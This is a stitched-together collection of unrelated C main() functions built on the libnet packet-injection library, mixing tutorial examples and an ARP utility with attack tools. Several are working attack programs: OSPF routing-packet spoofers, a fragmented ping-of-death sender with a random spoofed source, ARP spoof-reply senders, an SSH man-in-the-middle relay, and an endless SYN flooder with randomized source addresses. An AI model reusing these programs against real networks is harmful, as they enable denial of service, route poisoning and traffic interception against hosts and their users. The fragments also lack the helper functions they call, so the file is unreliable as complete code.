int main(int argc, char **argv) { int sock, warn, len; u_char *pack, *to, *from, *neighbor; u_long src, dst, addaid, addrid, nbr, auth[2]; if (argc != 4) help(argv[0]); from = argv[1]; to = argv[2]; neighbor = argv[3]; len = LIBNET_OSPF_H + LIBNET_HELLO_H + LIBNET_IP_H + LIBNET_AUTH_H; pack = (u_char *)malloc(len); sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); free(pack); exit(-1); } src = libnet_name_resolve(from, 0); dst = libnet_name_resolve(to, 0); nbr = libnet_name_resolve(neighbor, 0); addrid = 0x23696969; addaid = 0xc0ffee00; /* GENERIC : FAKE : ETC */ libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_HELLO_H, 0x00, 101, IP_DF, 254, IPPROTO_OSPF, src, dst, NULL, 0, pack); auth[0] = 0; auth[1] = 0; libnet_build_ospf(LIBNET_HELLO_H + LIBNET_AUTH_H, LIBNET_OSPF_HELLO, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth); libnet_build_ospf_hello(0xffffffff, 2, 0x00, 0x00, 30, src, src, nbr, NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); warn = libnet_write_ip(sock, pack, len); if (warn != len) { printf("Error sending: %d bytes written : %s\n", warn, strerror(errno)); free(pack); exit(warn); } else { printf("%d bytes written\n", warn); } free(pack); return (0); }
int main(int argc, char **argv) { int warn, sock, len; u_char *pack; char *from, *to, *adrtr; u_long src, dest, advrouter, addaid, addrid; u_char auth[2]; if (argc != 4) help(argv[0]); from = argv[1]; to = argv[2]; adrtr = argv[3]; sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); exit(-1); } src = libnet_name_resolve(from, 0); dest = libnet_name_resolve(to, 0); advrouter = libnet_name_resolve(adrtr, 0); addaid = 0xc0ffeeb0; addrid = 0xb00f00d0; len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H; pack = (u_char *)malloc(len); libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H, 0x00, (u_short)rand(), IP_DF, 0xff, IPPROTO_OSPF, src, dest, NULL, 0, pack); memset(auth, 0, sizeof(auth)); libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSR_H, LIBNET_OSPF_LSR, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth); libnet_build_ospf_lsr(LIBNET_LS_TYPE_RTR, 0xffffffff, advrouter, NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); warn = libnet_write_ip(sock, pack, len); if (warn == -1) { printf("Error writing packet to wire\n"); free(pack); } else { printf("%d bytes written\n", warn); } free(pack); return (0); }
int main(int argc, char *argv[]) { int c; u_long src_ip, dst_ip; char errbuf[256]; char *device = NULL; struct libnet_link_int *l; printf("link layer ICMP packet building/writing test\n"); src_ip = 0; dst_ip = 0; while ((c = getopt(argc, argv, "i:d:s:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 'i': device = optarg; break; case 's': if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; default: exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip || !device) { usage(argv[0]); exit(EXIT_FAILURE); } if ((l = libnet_open_link_interface(device, errbuf)) == NULL) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } c = send_icmp(l, device, src_ip, dst_ip); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc,char *argv[]) { char a; int sock,r; u_long src; u_long dst; char pktbuf[IP_MAXPACKET]; char payload[]="ABCDEFGHIJKLMNOPRST"; u_char options[4]; struct ipoption ipopt; bzero(options,OPT_LEN); while((a=getopt(argc,argv,"d:s:h?"))!=EOF) { switch(a) { case 'h' : { usage(); exit(1); } case 's' : { src=libnet_name_resolve(optarg,0); break;} case 'd' : { dst=libnet_name_resolve(optarg,0); break;} } } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock<0) { perror("socket"); exit(1); } libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf); memcpy(ipopt.ipopt_list, options, OPT_LEN); *(ipopt.ipopt_list) = 0xe4; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf); if (r <0) { libnet_close_raw_sock(sock); printf("Error ip options insertion failed\n"); exit(1); } r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload)); if (r<0) { libnet_close_raw_sock(sock); printf("Error write_ip \n"); exit(1); } libnet_close_raw_sock(sock); return 0; }
int main (int argc, char **argv) { unsigned long fakesrc, target; unsigned char *buf; unsigned char *data; int sock, i, flags, offset, len; if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("raw sock"); exit(1); } /* get random src addr. */ libnet_seed_prand(); fakesrc = libnet_get_prand(LIBNET_PRu32); buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H); data = (unsigned char *)malloc(FRAG_LEN); for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else len = 410; /* for total reconstructed len of 65538 */ /* make IP header. */ libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666, flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target, NULL, 0, buf); /* make ICMP packet. */ libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H); /* calculate ICMP checksum. */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len); /* send it. */ libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len); /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0), argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : ""); } free(buf); return (EXIT_SUCCESS); }
int main(int argc, char **argv) { struct libnet_link_int *intf; int nconnect; struct timeval tv; unsigned char spa[4], tpa[4]; unsigned char sha[ETH_ALEN], tha[ETH_ALEN]; unsigned long tmpip; gettimeofday(&tv, NULL); srand(tv.tv_sec ^ tv.tv_usec ^ (getpid()<<15)); if(argc < 3) { printf("usage: %s <spa> <sha> <tpa> <tha>\n", argv[0]); exit(1); } if((intf = libnet_open_link_interface(INTERFACE, NULL)) == NULL) { perror("open intf"); exit(1); } tmpip = libnet_name_resolve(argv[1], 0); memcpy(spa, &tmpip, 4); tmpip = libnet_name_resolve(argv[3], 0); memcpy(tpa, &tmpip, 4); memcpy(sha, hex2eth(argv[2]), ETH_ALEN); memcpy(tha, hex2eth(argv[4]), ETH_ALEN); arp_spoof_reply(intf, spa, sha, tpa, tha); }
int main(int argc, char **argv) { struct link_int *intf; int nconnect; char *dev = DEFAULT_DEV; struct timeval tv; struct eth_pair src, dst; gettimeofday(&tv, NULL); srand(tv.tv_sec ^ tv.tv_usec ^ (getpid()<<15)); if(argc < 6) { printf("usage: %s <IP broadcast> <IP netmask> <gw ip> <gw hw> <nconnects>\n", argv[0]); exit(1); } nconnect = atoi(argv[3]); if((intf = libnet_open_link_interface(dev, NULL)) == NULL) { perror("open intf"); exit(1); } netmask = libnet_name_resolve(argv[2], 0); broadcast = libnet_name_resolve(argv[1], 0); //fill_port_table(intf, dev, broadcast, netmask, nconnect); src.ip = rand(); memcpy(src.eth, &src.ip, 4); src.ip = libnet_name_resolve("130.126.44.109", 0); memcpy(dst.eth, hex2eth(argv[4]), ETH_ALEN); dst.ip = libnet_name_resolve(argv[3], 0); write_icmpether(intf, dev, &dst, &src); }
int main(int argc, char *argv[]) { int c; u_long ip; u_short lport, rport; lport = rport = 22; while ((c = getopt(argc, argv, "dIp:h?V")) != -1) { switch (c) { case 'd': Opt_debug = 1; break; case 'I': Opt_interact = 1; break; case 'p': if ((lport = atoi(optarg)) == 0) usage(); break; default: usage(); break; } } argc -= optind; argv += optind; if (argc < 1) usage(); if ((ip = libnet_name_resolve(argv[0], 1)) == -1) usage(); if (argc == 2 && (rport = atoi(argv[1])) == 0) usage(); record_init(NULL); mitm_init(lport, ip, rport); warnx("relaying to %s", argv[0]); mitm_run(); exit(0); }
int main(int argc, char *argv[]) { int i, c; char errbuf[256]; char *device = NULL; struct libnet_link_int *l; struct ether_addr e; u_long ip; while ((c = getopt(argc, argv, "i:")) != EOF) { switch (c) { case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } if (!device) { fprintf(stderr, "Specify a device\n"); exit(EXIT_FAILURE); } if (argc > optind) { if ((ip = libnet_name_resolve(argv[optind], 1)) == -1) { fprintf(stderr, "Cannot resolve IP address\n"); exit(EXIT_FAILURE); } } else { fprintf(stderr, "IP address to ARP for?\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } c = libnet_do_arp(l, device, &e, ip); if (c != -1) { for (i = 0; i < 6; i++) { printf("%x", e.ether_addr_octet[i]); if (i != 5) { printf(":"); } } printf("\n"); } return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { int c, amount; char errbuf[256]; char *device = NULL; struct link_int *l; u_long ip; amount = 20; while ((c = getopt(argc, argv, "n:i:")) != EOF) { switch (c) { case 'i': device = optarg; break; case 'n': amount = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!device) { usage(argv[0]); exit(EXIT_FAILURE); } if (argc <= optind) { usage(argv[0]); exit(EXIT_FAILURE); } else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1) { fprintf(stderr, "Cannot resolve IP address\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } while (amount--) { c = send_arp(l, ip, device); if (c == -1) { /* bail on the first error */ break; } } printf("\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { int c = -1; char errbuf[LIBNET_ERRBUF_SIZE]; char* device; char* ipaddr; char* macaddr; char* broadcast; char* netmask; u_int32_t ip; u_char src_mac[6]; LTYPE* l; int repeatcount = 1; int j; long msinterval = 1000; int flag; char pidfilenamebuf[64]; char *pidfilename = NULL; CL_SIGNAL(SIGTERM, byebye); CL_SIGINTERRUPT(SIGTERM, 1); cl_log_set_entity(SENDARPNAME); cl_log_enable_stderr(TRUE); cl_log_set_facility(LOG_USER); cl_inherit_logging_environment(0); while ((flag = getopt(argc, argv, "i:r:p:")) != EOF) { switch(flag) { case 'i': msinterval= atol(optarg); break; case 'r': repeatcount= atoi(optarg); break; case 'p': pidfilename= optarg; break; default: fprintf(stderr, "%s\n\n", print_usage); return 1; break; } } if (argc-optind != 5) { fprintf(stderr, "%s\n\n", print_usage); return 1; } /* * argv[optind+1] DEVICE dc0,eth0:0,hme0:0, * argv[optind+2] IP 192.168.195.186 * argv[optind+3] MAC ADDR 00a0cc34a878 * argv[optind+4] BROADCAST 192.168.195.186 * argv[optind+5] NETMASK ffffffffffff */ device = argv[optind]; ipaddr = argv[optind+1]; macaddr = argv[optind+2]; broadcast = argv[optind+3]; netmask = argv[optind+4]; if (!pidfilename) { if (snprintf(pidfilenamebuf, sizeof(pidfilenamebuf), "%s%s", PIDFILE_BASE, ipaddr) >= (int)sizeof(pidfilenamebuf)) { cl_log(LOG_INFO, "Pid file truncated"); return EXIT_FAILURE; } pidfilename = pidfilenamebuf; } if(write_pid_file(pidfilename) < 0) { return EXIT_FAILURE; } #if defined(HAVE_LIBNET_1_0_API) #ifdef ON_DARWIN if ((ip = libnet_name_resolve((unsigned char*)ipaddr, 1)) == -1UL) { #else if ((ip = libnet_name_resolve(ipaddr, 1)) == -1UL) { #endif cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr); unlink(pidfilename); return EXIT_FAILURE; } l = libnet_open_link_interface(device, errbuf); if (!l) { cl_log(LOG_ERR, "libnet_open_link_interface on %s: %s" , device, errbuf); unlink(pidfilename); return EXIT_FAILURE; } #elif defined(HAVE_LIBNET_1_1_API) if ((l=libnet_init(LIBNET_LINK, device, errbuf)) == NULL) { cl_log(LOG_ERR, "libnet_init failure on %s: %s", device, errbuf); unlink(pidfilename); return EXIT_FAILURE; } if ((signed)(ip = libnet_name2addr4(l, ipaddr, 1)) == -1) { cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr); unlink(pidfilename); return EXIT_FAILURE; } #else # error "Must have LIBNET API version defined." #endif if (!strcasecmp(macaddr, AUTO_MAC_ADDR)) { if (get_hw_addr(device, src_mac) < 0) { cl_log(LOG_ERR, "Cannot find mac address for %s", device); unlink(pidfilename); return EXIT_FAILURE; } } else { convert_macaddr((unsigned char *)macaddr, src_mac); } /* * We need to send both a broadcast ARP request as well as the ARP response we * were already sending. All the interesting research work for this fix was * done by Masaki Hasegawa <*****@*****.**> and his colleagues. */ for (j=0; j < repeatcount; ++j) { c = send_arp(l, ip, (unsigned char*)device, src_mac , (unsigned char*)broadcast, (unsigned char*)netmask , ARPOP_REQUEST); if (c < 0) { break; } mssleep(msinterval / 2); c = send_arp(l, ip, (unsigned char*)device, src_mac , (unsigned char *)broadcast , (unsigned char *)netmask, ARPOP_REPLY); if (c < 0) { break; } if (j != repeatcount-1) { mssleep(msinterval / 2); } } unlink(pidfilename); return c < 0 ? EXIT_FAILURE : EXIT_SUCCESS; } void convert_macaddr (u_char *macaddr, u_char enet_src[6]) { int i, pos; u_char bits[3]; pos = 0; for (i = 0; i < 6; i++) { /* Inserted to allow old-style MAC addresses */ if (*macaddr == ':') { pos++; } bits[0] = macaddr[pos++]; bits[1] = macaddr[pos++]; bits[2] = '\0'; enet_src[i] = strtol((const char *)bits, (char **)NULL, 16); } }
int main(int argc, char **argv) { int sock, warn, len; u_char *pack; char *from, *to; u_long src, dst, addrid, addaid, auth[2]; if (argc != 3) help(argv[0]); len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN; pack = (u_char *)malloc(len); from = argv[1]; to = argv[2]; src = libnet_name_resolve(from, 0); dst = libnet_name_resolve(to, 0); addrid = 0xff00ff00; addaid = 0xd00dd00d; sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); free(pack); exit(sock); } libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN, 0x00, (u_short)rand(), IP_DF, 0xfe, IPPROTO_OSPF, src, dst, NULL, 0, pack); libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN, LIBNET_OSPF_LSA, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); memset(auth, 0, sizeof(auth)); LIBNET_OSPF_AUTHCPY(pack + LIBNET_OSPF_H + LIBNET_IP_H, auth); libnet_build_ospf_lsa(40, 0x00, LIBNET_LS_TYPE_NET, addrid, src, 0xf0f0f00f, LIBNET_LS_NET_LEN, NULL, 0, pack + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H); libnet_build_ospf_lsa_net(0xffffff00, 0xc0ffee00, NULL, 0, pack + LIBNET_LSA_H + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); libnet_do_checksum(pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H, IPPROTO_OSPF_LSA, LIBNET_LS_NET_LEN + LIBNET_LSA_H); warn = libnet_write_ip(sock, pack, len); if (warn == -1) { printf("Error writing packet to the wire\n"); free(pack); exit(warn); } printf("%d bytes written\n", warn); free(pack); return (0); }
int main(int argc, char *argv[]) { int packet_size, /* size of our packet */ payload_size, /* size of our packet */ c; /* misc */ u_long src_ip, dst_ip; /* source ip, dest ip */ u_short bport, eport; /* beginning and end ports */ u_short cport; /* current port */ u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */ u_char *packet; /* pointer to our packet buffer */ char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */ u_char *device; /* pointer to the device to use */ struct libnet_link_int *network; /* pointer to link interface struct */ struct libnet_plist_chain plist; /* plist chain */ struct libnet_plist_chain *plist_p; /* plist chain pointer */ printf("libnet example code:\tmodule 4\n\n"); printf("packet injection interface:\tlink layer\n"); printf("packet type:\t\t\tUDP [with payload] using port list chaining\n"); plist_p = NULL; device = NULL; src_ip = 0; dst_ip = 0; while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg); } break; case 'i': device = optarg; break; case 's': if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", optarg); } break; case 'p': plist_p = &plist; if (libnet_plist_chain_new(&plist_p, optarg) == -1) { libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n"); } break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip || !plist_p) { usage(argv[0]); exit(EXIT_FAILURE); } c = argc - optind; if (c != 1) { usage(argv[0]); exit(EXIT_FAILURE); } memset(payload, 0, sizeof(payload)); strncpy(payload, argv[optind], strlen(argv[optind])); /* * Step 1: Network Initialization (interchangable with step 2). */ if (device == NULL) { struct sockaddr_in sin; /* * Try to locate a device. */ if (libnet_select_device(&sin, &device, err_buf) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf); } printf("device:\t\t\t\t%s\n", device); } if ((network = libnet_open_link_interface(device, err_buf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf); } /* * Get the payload from the user. Hrm. This might fail on a Sparc * if byte alignment is off... */ payload_size = strlen(payload); /* * We're going to build a UDP packet with a payload using the * link-layer API, so this time we need memory for a ethernet header * as well as memory for the ICMP and IP headers and our payload. */ packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size; /* * Step 2: Memory Initialization (interchangable with step 1). */ if (libnet_init_packet(packet_size, &packet) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); } /* * Step 3: Packet construction (ethernet header). */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet); /* * Step 3: Packet construction (IP header). */ libnet_build_ip(LIBNET_UDP_H + payload_size, 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_UDP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, packet + LIBNET_ETH_H); /* Packet header memory */ while (libnet_plist_chain_next_pair(plist_p, &bport, &eport)) { while (!(bport > eport) && bport != 0) { cport = bport++; /* * Step 3: Packet construction (UDP header). */ libnet_build_udp(242, /* source port */ cport, /* dest. port */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_ETH_H + LIBNET_IP_H); /* * Step 4: Packet checksums (ICMP header *AND* IP header). */ if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } /* * Step 5: Packet injection. */ c = libnet_write_link_layer(network, device, packet, packet_size); if (c < packet_size) { libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c); } else { printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport); } } } /* * Shut down the interface. */ if (libnet_close_link_interface(network) == -1) { libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface"); } /* * Free packet memory. */ libnet_destroy_packet(&packet); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { int sock, n, c, r, p_num; struct libnet_arena arena, *arena_p; u_char *packets[10]; u_char *payload; u_char *buf; u_long src_ip, dst_ip; src_ip = 0; dst_ip = 0; payload = NULL; while((c = getopt(argc, argv, "d:s:p:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(-1); } break; case 'p': payload = optarg; break; default: usage(); exit(-1); } } if (!src_ip || !dst_ip || !payload) { usage(); exit(-1); } /* allocate packet memory */ buf = (u_char *)malloc(LIBNET_IP_H + LIBNET_ICMP_H + strlen(payload)); if(!buf) { perror("malloc:"); exit(-1); } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(-1); } /* build headers */ libnet_build_ip(LIBNET_ICMP_ECHO_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT, TPING_ID, 0, TPING_TTL, IPPROTO_ICMP, src_ip, dst_ip, NULL, 0, buf); libnet_build_icmp_echo(ICMP_ECHO, 0, TPING_ID, 1, payload,strlen(payload), buf + LIBNET_IP_H); if (libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) < 0) { fprintf(stderr, "Can't do checksum!\n"); } /* * Write the packet to the network. */ r = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)); if (r < LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)) { fprintf(stderr, "Unable to send packet.\n"); } printf("ICMP Echo sent. Payload: %s\n",payload); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // allocate memory for packet if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length packet); // packet header memory libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // urgent pointer NULL, // payload (none) 0, // payload length packet + LIBNET_IP_H); // packet header memory if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // inject packet if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy_packet(&packet); // free packet memory if (libnet_close_raw_sock(network) == -1) // close the network interface libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main(int argc, char *argv[]) { // packet type (arp/udp/tcp) char type[5]; // network device char *device = "eth0\0"; struct libnet_link_int *link; // Raw socket int sock; // error buffer char errbuff[LIBNET_ERRBUF_SIZE]; // src and dst mac u_char dmac[6],smac[6]; // src and dst ip unsigned int src_ip, dst_ip; // packet buffer unsigned char *packet; // packet payload char *payload; // payload size int p_size; // bytes send over the wire int send; // check parameter if(argc == 1) { printf("Usage: %s <arp/udp/tcp>\n",argv[0]); exit(0); } else { strcpy(type,argv[1]); } // Allocate memory for the payload payload = malloc(50); // Packets payload strcpy(payload,"TEST LIBNET\0"); packet = NULL; // payload size p_size = strlen(payload); // mac address strcpy(smac,SMAC); strcpy(dmac,DMAC); // ip address in network byte order src_ip = inet_addr(SOURCE); dst_ip = inet_addr(DEST); // Lookup ip addresses src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0); dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0); // Build an ARP packet? if(!strcmp(type,"arp")) { // open the network device link = libnet_open_link_interface(device,errbuff); // Failed? if(link == NULL) { printf("Error while opening device %s!\n%s\n",device,errbuff); exit(1); } printf("Using device %s\n",device); // Allocate memory for the packet if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } if(packet == NULL) { printf("libnet_init_packet error!\n"); exit(1); } // Build ethernet header libnet_build_ethernet(dmac, // destination mac smac, // source mac ETHERTYPE_ARP,// ethernet packet type NULL, // pointer to payload 0, // payload size packet // pointer to packet buffer ); printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST); libnet_build_arp(ARPHRD_ETHER, // hardware type ETHERTYPE_IP, // protocol type ETHER_ADDR_LEN, // hardware address size 4, // protocol address size ARPOP_REPLY, // ARP operation smac, // source mac (u_char *)&src_ip, // source ip dmac, // destination mac (u_char *)&dst_ip, // destination ip NULL, // pointer to payload 0, // payload size packet+LIBNET_ETH_H // pointer to packet buffer ); // Get the packet on the wire send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the network device libnet_close_link_interface(link); } else { // Open a raw sock sock = libnet_open_raw_sock(IPPROTO_RAW); // Allocate memory for the packet if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } // Build ip header libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length 0, // ip type of service 242, // ip id 0, // fragmentation bit 48, // time to live IPPROTO_TCP, // Transport Control Protokoll src_ip, // source ip dst_ip, // destination ip NULL, // pointer to ip payload 0, // ip options packet // pointer to packet buffer ); // Build UDP packet? if(!strcmp(type,"udp")) { libnet_build_udp(ntohs(SPORT), // Source port ntohs(DPORT), // destination port payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to packet buffer ); printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Build TCP/IP packet per default else { // Build tcp header libnet_build_tcp(ntohs(SPORT), // source port ntohs(DPORT), // destination port 1000000000, // acknowledge number 1000000000, // sequence number TH_ACK, // tcp flags 1024, // window size 0, // urgent pointer payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to the packet buffer ); printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Calculize checksum libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size); // Get the packet on the wire send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the socket libnet_close_raw_sock(sock); } // free the memory //libnet_destroy_packet(packet); free(payload); free(errbuff); return 1; }
